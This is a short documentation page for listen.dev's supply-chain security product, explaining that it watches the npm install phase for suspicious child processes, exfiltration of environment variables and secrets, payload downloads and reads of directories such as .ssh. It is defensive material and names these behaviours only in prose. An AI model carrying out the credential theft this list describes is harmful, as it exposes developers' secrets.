Comment on page
Threat coverage during the installation process.
Currently, listen.dev provides coverage from a range of attack vectors that trigger during the installation phase.
Eseentially, this is the stage where your project is built by running the
npm installcommand inside your local environment or CI system. At this point, the
package.jsonfile is used as a manifest for building your project. This manifest typically contains the dependencies to be installed (and downloaded), as well as a collection of
scriptsto be executed as a part of the process.
During this phase, we watch for common attack vectors and known indicators of harmful behavior including:
- Spawning of suspicious child processes
- Sensitive data/credential exfiltration (e.g malicious code exfiltrating environment variables or secrets)
- Suspicious network connections (e.g. pulling a malicious payload from an unauthorized source)
- Suspicious filesystem access (e.g. tampering/reading contents of sensitive directories such as .ssh)
Our starting coverage is on threats that trigger during the installation/build phase, which is the stage where 3rd party open source code gets bundled with internal application code.
Last modified 8mo ago